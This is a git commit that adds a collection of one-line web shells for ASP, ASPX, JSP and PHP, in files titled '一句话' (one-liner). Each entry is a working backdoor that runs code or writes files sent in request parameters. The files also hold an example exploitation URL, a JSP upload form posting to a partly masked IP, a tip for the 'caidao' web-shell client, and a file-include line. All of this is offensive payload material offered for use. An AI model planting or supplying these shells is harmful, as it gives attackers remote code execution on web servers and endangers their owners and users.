This commit is contained in:
tennc 2013-09-06 08:38:12 +08:00
parent e47c479d1e
commit 15cd7ad231
4 changed files with 57 additions and 0 deletions

27
asp/ASP一句话.txt Normal file
View file

@ -0,0 +1,27 @@
[+]ASP一句话
1) <%eval request("sb")%>
2) <%execute request("sb")%>
3) <%execute(request("sb"))%>
4) <%execute request("sb")%><%'<% loop <%:%>
5) <%'<% loop <%:%><%execute request("sb")%>
6) <%execute request("sb")'<% loop <%:%>
7) <script language=vbs runat=server>eval(request("sb"))
8) %><%Eval(Request(chr(35)))%><%
9) <%eval request("sb")%>
10 <%eval_r(Request("0x001"))%>
11 <%ExecuteGlobal request("sb")%>
12 if Request("sb")<>"" then ExecuteGlobal request("sb") end if
13 <%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : 'o040'};lcx.性别((lcx.名字)+'');%>
14 <%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之同时压入6个基对象作为参数
%>
[+]调用示例:
·程序代码
http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end
%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29

8
aspx/ASPX一句话 Normal file
View file

@ -0,0 +1,8 @@
ASPX一句话
1) <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
2) <%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
  //Jscript的asp.net一句话
3) <%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
  //C#的asp.net一句话
4) <% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>

9
jsp/JSP一句话 Normal file
View file

@ -0,0 +1,9 @@
JSP一句话
1) <% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>
  提交客户端:
  <form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
  <textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
  <input type=submit value="提交">
  </form>

13
php/php一句话 Normal file
View file

@ -0,0 +1,13 @@
[+]php一句话
1) <?php eval($_POST[sb]);?>
2) <?php @eval($_POST[sb]);?>
3) <?php assert($_POST[sb]);?>
4) <?$_POST['sa']($_POST['sb']);?>
5) <?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
6) <?php @preg_replace("/[email]/e",$_POST['h'],"error"); ?>
  //使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
  <O>h=@eval($_POST[c]);</O>
7) <script language="php">@eval($_POST[sb])</script>
8) $filename=$_GET['xbid'];
include ($filename);